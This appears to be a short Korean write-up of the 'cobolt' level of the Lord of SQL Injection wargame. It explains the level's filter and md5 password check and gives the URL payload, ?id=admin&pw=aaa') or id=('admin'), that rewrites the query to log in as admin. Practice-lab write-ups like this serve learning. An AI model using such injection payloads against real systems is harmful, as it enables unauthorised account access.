LOS - cobolt

screenshot1

get파라미터의 id,pw를 쿼리에 넣고 id 가 admin일 때 문제가 풀리는 것 같다.

쿼리에는 다음과 같은 패턴이 차단된다.

    _ , prob , . , ()

 

select id from prob_cobolt where id='' and pw=md5('')

 

사용자의 비밀번호를 저장할때 md5로 단방향 암호화를 이용해 저장하는 것 같다.

일단 위 쿼리를 id가 admin이며 쿼리가 참이 되도록 만들면

 

select id from prob_cobolt where id='admin' and pw=md5('aaa') or id=('admin')

 

쿼리가 위와 같이 되도록 만들려면

 

?id=admin&pw=aaa') or id=('admin')     이렇게 url에 넣어주면

 

clear!